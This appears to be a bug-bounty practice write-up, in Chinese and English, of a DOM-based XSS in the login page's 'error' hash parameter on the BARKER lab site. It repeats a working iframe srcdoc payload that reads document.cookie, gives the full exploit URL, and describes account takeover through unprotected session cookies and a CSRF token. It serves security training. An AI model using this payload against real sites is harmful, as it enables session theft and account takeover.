bugbountyhunter scope BARKER:第四滴血 DOM型 XSS 報告

sec875發表於2024-08-02

使用賞獵技戰法 https://www.cnblogs.com/sec875/p/18335838

尋找功能點,熟悉功能點,收集引數,觀察正常(提供預期值(對的)或(不對的))與異常(提供非預期值),威脅建模

登入功能點:https://5cc259cfb319-sec875.a.barker-social.com/login

輸入不正確的賬號,觸發錯誤
image

檢查資料包,重定向到:https://5cc259cfb319-sec875.a.barker-social.com/login#error=1
image

發現引數值並尋找哪裡使用它:error
image

GPT一把梭
errorCode = decodeURIComponent(getHashValue("error"))

error不能等於1和2
image

如果值為其他就會插入到HTML DOM中,常規payload發現div標籤壞事(iframe xss payload 一把梭)
https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>

image

英哥歷史報告

l have discovered a DOM XSS vulnerability affecting the endpoint '/login' in the parameter 'error'. The payloed requires no filter bypass and is a simple, ' 666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'> '

You can see a working proof of concept here:

https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541963/gnx5lrl1o6zrpp5ygxsa.png)

To reproduce:
1.Entering an incorrect account number at the login page triggers an error

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541945/kab0m19vshvcxxo8gbpm.png)

2.Check the packet and redirect to errer 1: https://5cc259cfb319-sec875.a.barker-social.com/login#error=1

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541948/tura1uvxijgmpvg0vbal.png)

3.Finding the parameter value and finding where to use it: error

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541954/rwbmrvzkauapkg2fyakp.png)

Tracking Sources and Sinks: errorCode = decodeURIComponent(getHashValue("error"))

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541958/s2pp34rkvbs1b4srao5o.png)

4.You will observe xss executes

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722541963/gnx5lrl1o6zrpp5ygxsa.png)

Payload used: 666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>
Vulnerable parameter: error
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>

lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.

相關文章